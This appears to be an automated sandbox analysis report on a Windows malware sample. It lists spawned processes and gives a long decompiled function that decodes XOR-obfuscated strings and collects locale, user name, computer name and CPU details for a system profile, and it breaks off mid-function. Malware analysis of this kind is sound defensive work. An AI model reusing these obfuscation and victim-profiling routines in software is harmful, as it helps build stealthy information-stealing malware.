MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 2532 Parent PID: 5316

General

Start time:	08:53:41
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0x1270000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3460 Parent PID: 5316

General

Start time:	08:54:27
Start date:	28/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: eLZzxG56uH.exe PID: 3340 Parent PID: 6092 eLZzxG56uH.exeCOMMON

Executed Functions

Function 001F7819, Relevance: 102.7, APIs: 13, Strings: 45, Instructions: 1169
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E001F7819(intOrPtr __edx, void* __edi, void* __eflags) {
				void* __ebx;
				void* _t587;
				void* _t597;
				void* _t598;
				void* _t608;
				void* _t617;
				void* _t623;
				void* _t629;
				int _t631;
				void* _t638;
				void* _t643;
				void* _t646;
				void* _t660;
				void* _t678;
				void* _t680;
				void* _t685;
				void* _t693;
				void* _t701;
				void* _t703;
				int _t714;
				intOrPtr _t719;
				intOrPtr* _t723;
				void* _t732;
				void* _t733;
				void* _t742;
				void* _t745;
				void* _t751;
				int _t752;
				void* _t753;
				void* _t754;
				int _t762;
				void* _t763;
				void* _t778;
				void* _t779;
				int _t786;
				void* _t789;
				signed int _t795;
				char _t797;
				signed int _t798;
				signed char _t799;
				intOrPtr* _t802;
				signed int _t805;
				signed char _t808;
				CHAR* _t822;
				void* _t827;
				void* _t831;
				void* _t838;
				void* _t841;
				void* _t844;
				void* _t853;
				void* _t855;
				signed char _t859;
				void* _t863;
				void* _t867;
				void* _t871;
				void* _t876;
				void* _t879;
				void* _t889;
				void* _t893;
				void* _t896;
				void* _t899;
				void* _t902;
				void* _t905;
				void* _t908;
				void* _t915;
				void* _t919;
				void* _t923;
				void* _t929;
				void* _t933;
				void* _t935;
				void* _t938;
				void* _t950;
				void* _t953;
				void* _t956;
				void* _t964;
				int _t970;
				int _t975;
				signed char _t978;
				void* _t983;
				intOrPtr _t1010;
				signed char _t1011;
				void* _t1015;
				signed char _t1019;
				signed char _t1022;
				signed char _t1025;
				signed char _t1031;
				signed char _t1033;
				void* _t1034;
				void* _t1037;
				signed char _t1041;
				signed char _t1046;
				void* _t1055;
				signed char _t1059;
				signed char _t1065;
				signed char _t1068;
				signed char _t1071;
				signed char _t1076;
				signed char _t1094;
				void* _t1095;
				signed char _t1097;
				intOrPtr _t1098;
				signed char _t1101;
				signed char _t1103;
				signed char _t1106;
				signed char _t1109;
				signed char _t1112;
				signed char _t1129;
				signed char _t1130;
				void* _t1131;
				intOrPtr _t1135;
				void* _t1136;
				unsigned int _t1137;
				void* _t1144;
				void* _t1148;
				void* _t1149;
				void* _t1150;
				void* _t1152;
				void* _t1153;
				void* _t1155;
				void* _t1159;
				void* _t1160;
				void* _t1161;
				void* _t1162;
				void* _t1163;
				void* _t1166;
				intOrPtr _t1169;
				void* _t1170;
				void* _t1171;
				void* _t1173;
				CHAR* _t1177;
				intOrPtr* _t1179;
				void* _t1180;
				void* _t1182;
				void* _t1183;
				void* _t1184;
				void* _t1186;

				_t1186 = __eflags;
				_t1131 = __edi;
				_t1010 = __edx;
				L00227790(0x22ab90, _t1180);
				_t1183 = _t1182 - 0xba4;
				_t1143 =  *((intOrPtr*)(_t1180 + 8));
				E001D257E(_t1180 - 0x3b8,  *((intOrPtr*)(_t1180 + 8)));
				 *(_t1180 - 4) =  *(_t1180 - 4) & 0x00000000;
				E001D257E(_t1180 - 0x3a0,  *((intOrPtr*)(_t1180 + 8)) + 0x18);
				 *(_t1180 - 4) = 1;
				E001D257E(_t1180 - 0x388,  *((intOrPtr*)(_t1180 + 8)) + 0x48);
				 *(_t1180 - 4) = 2;
				E001D257E(_t1180 - 0x370,  *((intOrPtr*)(_t1180 + 8)) + 0x78);
				 *(_t1180 - 4) = 3;
				E001D257E(_t1180 - 0x430, _t1143 + 0x90);
				 *(_t1180 - 4) = 4;
				E001D257E(_t1180 - 0x418, _t1143 + 0xa8);
				 *(_t1180 - 4) = 5;
				E001D257E(_t1180 - 0x400, _t1143 + 0xc0);
				 *(_t1180 - 4) = 6;
				E001F73C6(_t1180 - 0x358); // executed
				 *(_t1180 - 4) = 7;
				 *((intOrPtr*)(_t1180 - 0x250)) = E00211D10(_t1180 - 0x358, _t1010, 0);
				 *((intOrPtr*)(_t1180 - 0x24c)) = _t1010;
				_t587 = E00211A10(_t1180 - 0x358, _t1010, _t1186, _t1180 - 0x250);
				_t795 = 8;
				_t1144 = _t587;
				 *((short*)(_t1180 - 0xad)) = 0x7451;
				_t1011 = 0x51;
				 *(_t1180 - 0xab) = _t795;
				 *((intOrPtr*)(_t1180 - 0xaa)) = 0x7f3c747f;
				_t822 = 0;
				 *((intOrPtr*)(_t1180 - 0xa6)) = 0x7c713574;
				 *((intOrPtr*)(_t1180 - 0xa2)) = 0x97471;
				while(1) {
					 *(_t1180 + _t822 - 0xac) =  *(_t1180 + _t822 - 0xac) ^ _t1011;
					_t822 = _t822 + 1;
					if(_t822 >= 0xd) {
						break;
					}
					_t1011 =  *((intOrPtr*)(_t1180 - 0xad));
				}
				 *((char*)(_t1180 - 0x9f)) = 0;
				E00211734(_t1180 - 0x6fc, 0xc8, _t1180 - 0xac, _t1144);
				E00202C70(_t1131, _t1180 - 0x634, 0, 0x100);
				_t1184 = _t1183 + 0x1c;
				GetLocaleInfoA(GetUserDefaultLCID(), 0x1001, _t1180 - 0x634, 0x100);
				_push(1);
				E001F922A(_t1180 - 0x338);
				 *(_t1180 - 4) = _t795;
				_t597 = E001D2449(0x24a8c0);
				_t598 = E001F5C6D();
				_push(0x40);
				E001F91AD(_t795, _t1180 - 0x338, __eflags, L001F57CC(_t598, _t597), 0x12); // executed
				asm("movaps xmm0, [0x23daf0]");
				_t827 = 0;
				__eflags = 0;
				asm("movups [ebp-0x12b], xmm0");
				 *((intOrPtr*)(_t1180 - 0x11b)) = 0x59481448;
				 *((intOrPtr*)(_t1180 - 0x117)) = 0x59465046;
				 *((char*)(_t1180 - 0x113)) = 0;
				do {
					 *(_t1180 + _t827 - 0x12a) =  *(_t1180 + _t827 - 0x12a) ^  *(_t1180 - 0x12b);
					_t827 = _t827 + 1;
					__eflags = _t827 - 0x17;
				} while (_t827 < 0x17);
				_push(_t1131);
				 *((char*)(_t1180 - 0x113)) = 0;
				E001D3B98(_t1180 - 0x328, _t1180 - 0x12a);
				E001D3D59(0x24a6f8);
				_t1015 = E001D2524(_t1180 - 0x488, "Wed Sep  8 00:01:38 2021");
				 *(_t1180 - 4) = 9;
				_t831 = 0;
				__eflags = 0;
				asm("movaps xmm0, [0x23dae0]");
				asm("movups [ebp-0x188], xmm0");
				 *((intOrPtr*)(_t1180 - 0x178)) = 0x69362732;
				 *((short*)(_t1180 - 0x174)) = 0x73;
				do {
					 *(_t1180 + _t831 - 0x187) =  *(_t1180 + _t831 - 0x187) ^  *(_t1180 - 0x188);
					_t831 = _t831 + 1;
					__eflags = _t831 - 0x14;
				} while (_t831 < 0x14);
				 *((char*)(_t1180 - 0x173)) = 0;
				_t608 = E001DC2AE(_t1180 - 0x4d0, _t1180 - 0x187, _t1015);
				 *(_t1180 - 4) = 0xa;
				E001D3D59(_t608);
				E001D2F2D(_t1180 - 0x4d0);
				 *(_t1180 - 4) = _t795;
				E001D2F2D(_t1180 - 0x488);
				_t1148 = E001D3D59(0x24a6f8);
				 *((intOrPtr*)(_t1180 - 0xbc)) = 0x283c115d;
				_t1019 = 0x5d;
				 *((intOrPtr*)(_t1180 - 0xb8)) = 0x38353e33;
				 *((intOrPtr*)(_t1180 - 0xb4)) = 0x293c7d39;
				_t838 = 0;
				__eflags = 0;
				 *((short*)(_t1180 - 0xb0)) = 0x7d67;
				 *((char*)(_t1180 - 0xae)) = 0;
				while(1) {
					 *(_t1180 + _t838 - 0xbb) =  *(_t1180 + _t838 - 0xbb) ^ _t1019;
					_t838 = _t838 + 1;
					__eflags = _t838 - 0xd;
					if(_t838 >= 0xd) {
						break;
					}
					_t1019 =  *((intOrPtr*)(_t1180 - 0xbc));
				}
				 *((char*)(_t1180 - 0xae)) = 0;
				_t1149 = E001D3B98(E001D3B98(_t1148, _t1180 - 0xbb), _t1180 - 0x6fc);
				 *((intOrPtr*)(_t1180 - 0x30)) = 0x616b0c2c;
				_t1022 = 0x2c;
				 *((short*)(_t1180 - 0x2c)) = 0x78;
				_t841 = 0;
				__eflags = 0;
				while(1) {
					 *(_t1180 + _t841 - 0x2f) =  *(_t1180 + _t841 - 0x2f) ^ _t1022;
					_t841 = _t841 + 1;
					__eflags = _t841 - 4;
					if(_t841 >= 4) {
						break;
					}
					_t1022 =  *((intOrPtr*)(_t1180 - 0x30));
				}
				 *((char*)(_t1180 - 0x2b)) = 0;
				E001D3B98(_t1149, _t1180 - 0x2f);
				_t1150 = E001D3D59(0x24a6f8);
				 *((intOrPtr*)(_t1180 - 0x66)) = 0x465d7032;
				_t1025 = 0x32;
				 *((short*)(_t1180 - 0x62)) = 0x7b6d;
				 *((char*)(_t1180 - 0x60)) = 0x76;
				_t844 = 0;
				__eflags = 0;
				 *(_t1180 - 0x5f) = _t795;
				 *((short*)(_t1180 - 0x5e)) = 0x12;
				while(1) {
					 *(_t1180 + _t844 - 0x65) =  *(_t1180 + _t844 - 0x65) ^ _t1025;
					_t844 = _t844 + 1;
					__eflags = _t844 - _t795;
					if(_t844 >= _t795) {
						break;
					}
					_t1025 =  *((intOrPtr*)(_t1180 - 0x66));
				}
				 *((char*)(_t1180 - 0x5d)) = 0;
				_t617 = E001D3B98(_t1150, _t1180 - 0x65);
				 *(_t1180 - 0x1b8) = 0x101;
				GetUserNameA(_t1180 - 0x9a8, _t1180 - 0x1b8); // executed
				 *((char*)(_t1180 + 0xb)) = 0;
				 *((char*)(_t1180 + 9)) = 0x10;
				 *((char*)(_t1180 + 0xa)) = 0x4f;
				 *((char*)(_t1180 + 0xb)) = 0;
				_t623 = E001F8AD4(_t1180 - 0x4a0,  *0x22d010); // executed
				 *(_t1180 - 4) = 0xb;
				E001D3B98(_t617, L001F57CC(L001F57CC(E001D2449(_t623), _t1180 + 0xa), _t1180 - 0x9a8));
				 *(_t1180 - 4) = _t795;
				E001D2F2D(_t1180 - 0x4a0);
				_t629 = E001D3D59(0x24a6f8);
				__eflags = 0;
				 *((intOrPtr*)(_t1180 - 0xcb)) = 0x19022577;
				_t1152 = _t629;
				 *((intOrPtr*)(_t1180 - 0xc7)) = 0x10191e19;
				_t1031 = 0x77;
				 *((intOrPtr*)(_t1180 - 0xc3)) = 0x57191857;
				 *((short*)(_t1180 - 0xbf)) = 0x5716;
				_t853 = 0;
				 *((char*)(_t1180 - 0xbd)) = 0;
				while(1) {
					 *(_t1180 + _t853 - 0xca) =  *(_t1180 + _t853 - 0xca) ^ _t1031;
					_t853 = _t853 + 1;
					__eflags = _t853 - 0xd;
					if(_t853 >= 0xd) {
						break;
					}
					_t1031 =  *((intOrPtr*)(_t1180 - 0xcb));
				}
				 *((char*)(_t1180 - 0xbd)) = 0;
				_t1153 = E001D3B98(_t1152, _t1180 - 0xca);
				_t631 = E001F8AB2();
				_t855 = 0;
				__eflags = _t631;
				if(_t631 == 0) {
					_t1033 = 0x46;
					 *((intOrPtr*)(_t1180 - 0x53)) = 0x35232246;
					 *((intOrPtr*)(_t1180 - 0x4f)) = 0x3629322d;
					 *((char*)(_t1180 - 0x4b)) = 0;
					while(1) {
						 *(_t1180 + _t855 - 0x52) =  *(_t1180 + _t855 - 0x52) ^ _t1033;
						_t855 = _t855 + 1;
						__eflags = _t855 - 7;
						if(_t855 >= 7) {
							break;
						}
						_t151 = _t1180 - 0x53; // 0x35232246
						_t1033 =  *_t151;
					}
					 *((char*)(_t1180 - 0x4b)) = 0;
					_t1034 = _t1180 - 0x52;
				} else {
					_t1130 = 0x60;
					 *((intOrPtr*)(_t1180 - 0x4a)) = 0x10010c60;
					 *((intOrPtr*)(_t1180 - 0x46)) = 0x100f14;
					while(1) {
						 *(_t1180 + _t855 - 0x49) =  *(_t1180 + _t855 - 0x49) ^ _t1130;
						_t855 = _t855 + 1;
						__eflags = _t855 - 6;
						if(_t855 >= 6) {
							break;
						}
						_t1130 =  *((intOrPtr*)(_t1180 - 0x4a));
					}
					 *((char*)(_t1180 - 0x43)) = 0;
					_t1034 = _t1180 - 0x49;
				}
				E001D3B98(_t1153, _t1034);
				E001D3D59(0x24a6f8);
				_t1155 = E001D3D59(0x24a6f8);
				 *((intOrPtr*)(_t1180 - 0xda)) = 0x3030301d;
				_t859 = 0x1d;
				 *((intOrPtr*)(_t1180 - 0xd6)) = 0x30303030;
				 *((intOrPtr*)(_t1180 - 0xd2)) = 0x30303030;
				_t1037 = 0;
				 *((short*)(_t1180 - 0xce)) = 0x3030;
				 *((char*)(_t1180 - 0xcc)) = 0;
				while(1) {
					 *(_t1180 + _t1037 - 0xd9) =  *(_t1180 + _t1037 - 0xd9) ^ _t859;
					_t1037 = _t1037 + 1;
					__eflags = _t1037 - 0xd;
					if(_t1037 >= 0xd) {
						break;
					}
					_t859 =  *((intOrPtr*)(_t1180 - 0xda));
				}
				 *((char*)(_t1180 - 0xcc)) = 0;
				E001D3B98(_t1155, _t1180 - 0xd9);
				E001D3D59(0x24a6f8);
				E001D3D59(0x24a6f8);
				_t1041 = 0xb;
				 *((intOrPtr*)(_t1180 - 0xe9)) = 0x262b2b0b;
				 *((intOrPtr*)(_t1180 - 0xe5)) = 0x6464482b;
				_t863 = 0;
				 *((intOrPtr*)(_t1180 - 0xe1)) = 0x786e6260;
				 *((short*)(_t1180 - 0xdd)) = 0x2b31;
				 *((char*)(_t1180 - 0xdb)) = 0;
				while(1) {
					 *(_t1180 + _t863 - 0xe8) =  *(_t1180 + _t863 - 0xe8) ^ _t1041;
					_t863 = _t863 + 1;
					__eflags = _t863 - 0xd;
					if(_t863 >= 0xd) {
						break;
					}
					_t1041 =  *((intOrPtr*)(_t1180 - 0xe9));
				}
				 *((char*)(_t1180 - 0xdb)) = 0;
				_t638 = E001D3B98(_t1180 - 0x328, _t1180 - 0xe8);
				_push( *0x24c204);
				E001F9503(_t638);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23dc20]");
				_t867 = 0;
				asm("movups [ebp-0x225], xmm0");
				 *((char*)(_t1180 - 0x215)) = 0;
				do {
					 *(_t1180 + _t867 - 0x224) =  *(_t1180 + _t867 - 0x224) ^  *(_t1180 - 0x225);
					_t867 = _t867 + 1;
					__eflags = _t867 - 0xf;
				} while (_t867 < 0xf);
				 *((char*)(_t1180 - 0x215)) = 0;
				_t643 = E001D3B98(_t1180 - 0x328, _t1180 - 0x224);
				_push( *0x24c208);
				E001F9503(_t643);
				E001D3D59(0x24a6f8);
				_t1046 = 0xf;
				 *((intOrPtr*)(_t1180 - 0x9e)) = 0x222f2f0f;
				 *((intOrPtr*)(_t1180 - 0x9a)) = 0x6366492f;
				_t871 = 0;
				 *((intOrPtr*)(_t1180 - 0x96)) = 0x2f357c6a;
				 *((char*)(_t1180 - 0x92)) = 0;
				while(1) {
					 *(_t1180 + _t871 - 0x9d) =  *(_t1180 + _t871 - 0x9d) ^ _t1046;
					_t871 = _t871 + 1;
					__eflags = _t871 - 0xb;
					if(_t871 >= 0xb) {
						break;
					}
					_t1046 =  *((intOrPtr*)(_t1180 - 0x9e));
				}
				 *((char*)(_t1180 - 0x92)) = 0;
				_t646 = E001D3B98(_t1180 - 0x328, _t1180 - 0x9d);
				_push( *0x24c200);
				E001F9503(_t646);
				E001D3D59(0x24a6f8);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23d760]");
				_t876 = 0;
				asm("movups [ebp-0x1b3], xmm0");
				 *((intOrPtr*)(_t1180 - 0x1a3)) = 0x4e1a1b1d;
				 *((char*)(_t1180 - 0x19f)) = 0;
				do {
					 *(_t1180 + _t876 - 0x1b2) =  *(_t1180 + _t876 - 0x1b2) ^  *(_t1180 - 0x1b3);
					_t876 = _t876 + 1;
					__eflags = _t876 - 0x13;
				} while (_t876 < 0x13);
				 *((char*)(_t1180 - 0x19f)) = 0;
				E001D3B98(_t1180 - 0x328, _t1180 - 0x1b2);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23dbd0]");
				_t879 = 0;
				asm("movups [ebp-0x15b], xmm0");
				 *((intOrPtr*)(_t1180 - 0x14b)) = 0x484a4c58;
				 *((short*)(_t1180 - 0x147)) = 0xd17;
				 *((char*)(_t1180 - 0x145)) = 0;
				do {
					 *(_t1180 + _t879 - 0x15a) =  *(_t1180 + _t879 - 0x15a) ^  *(_t1180 - 0x15b);
					_t879 = _t879 + 1;
					__eflags = _t879 - 0x15;
				} while (_t879 < 0x15);
				 *((char*)(_t1180 - 0x145)) = 0;
				E001D3B98(E001D3B98(_t1180 - 0x328, _t1180 - 0x15a), _t1180 - 0x634);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23dba0]");
				_t1055 = 0;
				__eflags = 0;
				_t797 = 0x4d;
				asm("movups [ebp-0x172], xmm0");
				 *((char*)(_t1180 - 0x162)) = 0x78;
				 *((char*)(_t1180 - 0x161)) = _t797;
				 *((intOrPtr*)(_t1180 - 0x160)) = 0x218474c;
				 *((char*)(_t1180 - 0x15c)) = 0;
				do {
					 *(_t1180 + _t1055 - 0x171) =  *(_t1180 + _t1055 - 0x171) ^  *(_t1180 - 0x172);
					_t1055 = _t1055 + 1;
					__eflags = _t1055 - 0x15;
				} while (_t1055 < 0x15);
				 *((char*)(_t1180 - 0x15c)) = 0;
				E001D3B98(_t1180 - 0x328, _t1180 - 0x171);
				_t660 = E001F71FA(_t797, _t1180 - 0x4b8, __eflags); // executed
				 *(_t1180 - 4) = 0xc;
				E001D3D59(_t660);
				E001D3D59(0x24a6f8);
				_t798 = 8;
				 *(_t1180 - 4) = _t798;
				E001D2F2D(_t1180 - 0x4b8);
				_t1059 = 0x6b;
				 *(_t1180 - 0x70) = _t1059;
				_t889 = 0;
				__eflags = 0;
				 *((intOrPtr*)(_t1180 - 0x6f)) = 0x4b464b4b;
				 *((intOrPtr*)(_t1180 - 0x6b)) = 0x4b513b22;
				 *((char*)(_t1180 - 0x67)) = 0;
				while(1) {
					 *(_t1180 + _t889 - 0x6f) =  *(_t1180 + _t889 - 0x6f) ^ _t1059;
					_t889 = _t889 + 1;
					__eflags = _t889 - _t798;
					if(_t889 >= _t798) {
						break;
					}
					_t1059 =  *(_t1180 - 0x70);
				}
				_t248 = _t1180 - 0x6f; // 0x4b464b4b
				 *((char*)(_t1180 - 0x67)) = 0;
				E001D3B98(_t1180 - 0x328, _t248);
				E001D3D59(_t1180 - 0x3b8);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23d800]");
				_t893 = 0;
				__eflags = 0;
				asm("movups [ebp-0x235], xmm0");
				_t799 = 0x4d;
				do {
					 *(_t1180 + _t893 - 0x234) =  *(_t1180 + _t893 - 0x234) ^  *(_t1180 - 0x235);
					_t893 = _t893 + 1;
					__eflags = _t893 - 0xe;
				} while (_t893 < 0xe);
				 *((char*)(_t1180 - 0x226)) = 0;
				E001D3B98(_t1180 - 0x328, _t1180 - 0x234);
				_t1159 = E001D3D59(_t1180 - 0x418);
				 *((intOrPtr*)(_t1180 - 0x10)) = 0x151935;
				_t1065 = 0x35;
				_t896 = 0;
				__eflags = 0;
				while(1) {
					 *(_t1180 + _t896 - 0xf) =  *(_t1180 + _t896 - 0xf) ^ _t1065;
					_t896 = _t896 + 1;
					__eflags = _t896 - 2;
					if(_t896 >= 2) {
						break;
					}
					_t1065 =  *((intOrPtr*)(_t1180 - 0x10));
				}
				 *((char*)(_t1180 - 0xd)) = 0;
				E001D3B98(_t1159, _t1180 - 0xf);
				_t1160 = E001D3D59(_t1180 - 0x400);
				 *((intOrPtr*)(_t1180 - 0x25)) = 0x25e0222;
				_t1068 = 0x22;
				 *((char*)(_t1180 - 0x21)) = 0;
				_t899 = 0;
				__eflags = 0;
				while(1) {
					 *(_t1180 + _t899 - 0x24) =  *(_t1180 + _t899 - 0x24) ^ _t1068;
					_t899 = _t899 + 1;
					__eflags = _t899 - 3;
					if(_t899 >= 3) {
						break;
					}
					_t1068 =  *((intOrPtr*)(_t1180 - 0x25));
				}
				 *((char*)(_t1180 - 0x21)) = 0;
				E001D3B98(_t1160, _t1180 - 0x24);
				_t1161 = E001D3D59(_t1180 - 0x370);
				 *((intOrPtr*)(_t1180 - 0x14)) = 0x3a361a;
				_t1071 = 0x1a;
				_t902 = 0;
				__eflags = 0;
				while(1) {
					 *(_t1180 + _t902 - 0x13) =  *(_t1180 + _t902 - 0x13) ^ _t1071;
					_t902 = _t902 + 1;
					__eflags = _t902 - 2;
					if(_t902 >= 2) {
						break;
					}
					_t1071 =  *((intOrPtr*)(_t1180 - 0x14));
				}
				 *((char*)(_t1180 - 0x11)) = 0;
				E001D3B98(_t1161, _t1180 - 0x13);
				_t1162 = E001D3D59(_t1180 - 0x388);
				 *(_t1180 - 0x18) = _t799;
				 *((short*)(_t1180 - 0x17)) = 0x6d61;
				_t905 = 0;
				__eflags = 0;
				 *((char*)(_t1180 - 0x15)) = 0;
				while(1) {
					 *(_t1180 + _t905 - 0x17) =  *(_t1180 + _t905 - 0x17) ^ _t799;
					_t905 = _t905 + 1;
					__eflags = _t905 - 2;
					if(_t905 >= 2) {
						break;
					}
					_t799 =  *(_t1180 - 0x18);
				}
				__eflags = 0;
				 *((char*)(_t1180 - 0x15)) = 0;
				E001D3B98(_t1162, _t1180 - 0x17);
				_t678 = E001D3D59(_t1180 - 0x3a0);
				_t1076 = 0x27;
				_t1163 = _t678;
				 *(_t1180 - 0x1c) = _t1076;
				 *((short*)(_t1180 - 0x1b)) = 0xf07;
				_t908 = 0;
				 *((char*)(_t1180 - 0x19)) = 0;
				while(1) {
					 *(_t1180 + _t908 - 0x1b) =  *(_t1180 + _t908 - 0x1b) ^ _t1076;
					_t908 = _t908 + 1;
					__eflags = _t908 - 2;
					if(_t908 >= 2) {
						break;
					}
					_t1076 =  *(_t1180 - 0x1c);
				}
				 *((char*)(_t1180 - 0x19)) = 0;
				E001D3B98(_t1163, _t1180 - 0x1b);
				_t680 = E001D3D59(_t1180 - 0x430);
				 *((char*)(_t1180 - 0x42)) = 0x2e;
				__eflags = 7;
				 *((char*)(_t1180 - 0x40)) = 0;
				 *((char*)(_t1180 - 0x41)) = 7;
				E001D3B98(_t680, _t1180 - 0x41);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23d9e0]");
				_t915 = 0;
				asm("movups [ebp-0x1d8], xmm0");
				 *((intOrPtr*)(_t1180 - 0x1c8)) = 0x6c7629;
				do {
					 *(_t1180 + _t915 - 0x1d7) =  *(_t1180 + _t915 - 0x1d7) ^  *(_t1180 - 0x1d8);
					_t915 = _t915 + 1;
					__eflags = _t915 - 0x12;
				} while (_t915 < 0x12);
				 *((char*)(_t1180 - 0x1c5)) = 0;
				_t685 = E001D3B98(_t1180 - 0x328, _t1180 - 0x1d7);
				 *(_t1180 - 0x1bc) = 0x101;
				GetComputerNameA(_t1180 - 0xaac, _t1180 - 0x1bc);
				E001D3B98(_t685, _t1180 - 0xaac);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23d7d0]");
				_t919 = 0;
				asm("movups [ebp-0x245], xmm0");
				do {
					 *(_t1180 + _t919 - 0x244) =  *(_t1180 + _t919 - 0x244) ^  *(_t1180 - 0x245);
					_t919 = _t919 + 1;
					__eflags = _t919 - 0xe;
				} while (_t919 < 0xe);
				 *((char*)(_t1180 - 0x236)) = 0;
				_t693 = E001D3B98(_t1180 - 0x328, _t1180 - 0x244);
				 *(_t1180 - 0x1f0) = 0x101;
				GetUserNameA(_t1180 - 0xbb0, _t1180 - 0x1f0);
				E001D3B98(_t693, _t1180 - 0xbb0);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23dcc0]");
				_t923 = 0;
				asm("movups [ebp-0x112], xmm0");
				 *((intOrPtr*)(_t1180 - 0x102)) = 0x74757369;
				 *((intOrPtr*)(_t1180 - 0xfe)) = 0x4e543a20;
				 *((short*)(_t1180 - 0xfa)) = 0x3a;
				do {
					 *(_t1180 + _t923 - 0x111) =  *(_t1180 + _t923 - 0x111) ^  *(_t1180 - 0x112);
					_t923 = _t923 + 1;
					__eflags = _t923 - 0x18;
				} while (_t923 < 0x18);
				 *((char*)(_t1180 - 0xf9)) = 0;
				_t701 = E001D3B98(_t1180 - 0x328, _t1180 - 0x111);
				_push( *((intOrPtr*)(_t1180 - 0x340)));
				_t703 = E001D3A0B(E001F9503(_t701), 0x2e);
				_push( *((intOrPtr*)(_t1180 - 0x33c)));
				E001F9503(_t703);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23d9d0]");
				_t929 = 0;
				asm("movups [ebp-0x1ec], xmm0");
				 *((intOrPtr*)(_t1180 - 0x1dc)) = 0x524817;
				do {
					 *(_t1180 + _t929 - 0x1eb) =  *(_t1180 + _t929 - 0x1eb) ^  *(_t1180 - 0x1ec);
					_t929 = _t929 + 1;
					__eflags = _t929 - 0x12;
				} while (_t929 < 0x12);
				 *((char*)(_t1180 - 0x1d9)) = 0;
				E001D3B98(_t1180 - 0x328, _t1180 - 0x1eb);
				E001D3D59(_t1180 - 0x358);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23dd20]");
				_t933 = 0;
				asm("movups [ebp-0x203], xmm0");
				 *((short*)(_t1180 - 0x1f3)) = 0x3b21;
				 *((char*)(_t1180 - 0x1f1)) = 0;
				do {
					 *(_t1180 + _t933 - 0x202) =  *(_t1180 + _t933 - 0x202) ^  *(_t1180 - 0x203);
					_t933 = _t933 + 1;
					__eflags = _t933 - 0x11;
				} while (_t933 < 0x11);
				 *((char*)(_t1180 - 0x1f1)) = 0;
				_t1166 = E001D3B98(_t1180 - 0x328, _t1180 - 0x202);
				_t714 = E001F71D4();
				_t935 = 0;
				__eflags = _t714;
				if(_t714 == 0) {
					_t1094 = 0x62;
					 *((intOrPtr*)(_t1180 - 0x2a)) = 0x50511a62;
					 *((char*)(_t1180 - 0x26)) = 0;
					while(1) {
						 *(_t1180 + _t935 - 0x29) =  *(_t1180 + _t935 - 0x29) ^ _t1094;
						_t935 = _t935 + 1;
						__eflags = _t935 - 3;
						if(_t935 >= 3) {
							break;
						}
						_t1094 =  *((intOrPtr*)(_t1180 - 0x2a));
					}
					 *((char*)(_t1180 - 0x26)) = 0;
					_t1095 = _t1180 - 0x29;
				} else {
					__eflags = 0;
					 *((short*)(_t1180 - 0x35)) = 0x4c34;
					_t1129 = 0x34;
					 *((char*)(_t1180 - 0x33)) = 2;
					 *((short*)(_t1180 - 0x32)) = 0;
					while(1) {
						 *(_t1180 + _t935 - 0x34) =  *(_t1180 + _t935 - 0x34) ^ _t1129;
						_t935 = _t935 + 1;
						__eflags = _t935 - 3;
						if(_t935 >= 3) {
							break;
						}
						_t1129 =  *((intOrPtr*)(_t1180 - 0x35));
					}
					 *((char*)(_t1180 - 0x31)) = 0;
					_t1095 = _t1180 - 0x34;
				}
				E001D3B98(_t1166, _t1095);
				E001D3D59(0x24a6f8);
				_t1097 = 0xf;
				 *((intOrPtr*)(_t1180 - 0x7b)) = 0x222f2f0f;
				 *((intOrPtr*)(_t1180 - 0x77)) = 0x5a5f4c2f;
				_t938 = 0;
				 *((short*)(_t1180 - 0x73)) = 0x2f35;
				 *((char*)(_t1180 - 0x71)) = 0;
				while(1) {
					 *(_t1180 + _t938 - 0x7a) =  *(_t1180 + _t938 - 0x7a) ^ _t1097;
					_t938 = _t938 + 1;
					__eflags = _t938 - 9;
					if(_t938 >= 9) {
						break;
					}
					_t1097 =  *((intOrPtr*)(_t1180 - 0x7b));
				}
				_t1098 = _t1180 - 0x7a;
				 *((char*)(_t1180 - 0x71)) = 0;
				E001D3B98(_t1180 - 0x328, _t1098);
				asm("movaps xmm0, [0x23d6c0]");
				_t1135 = 0x80000000;
				_push(0);
				asm("cpuid");
				asm("movups [ebp-0x214], xmm0");
				_t802 = _t1180 - 0x214;
				 *_t802 = 0x80000000;
				 *((intOrPtr*)(_t802 + 4)) = 0;
				 *((intOrPtr*)(_t802 + 8)) = 0;
				 *((intOrPtr*)(_t802 + 0xc)) = _t1098;
				_t719 =  *((intOrPtr*)(_t1180 - 0x214));
				 *((intOrPtr*)(_t1180 - 0x1c0)) = _t719;
				__eflags = _t719 - 0x80000000;
				if(_t719 >= 0x80000000) {
					do {
						_push(_t802);
						asm("cpuid");
						_t1179 = _t802;
						_t802 = _t1180 - 0x214;
						 *_t802 = _t1135;
						 *((intOrPtr*)(_t802 + 4)) = _t1179;
						 *((intOrPtr*)(_t802 + 8)) = 0;
						 *((intOrPtr*)(_t802 + 0xc)) = _t1098;
						__eflags = _t1135 - 0x80000002;
						if(_t1135 != 0x80000002) {
							__eflags = _t1135 - 0x80000003;
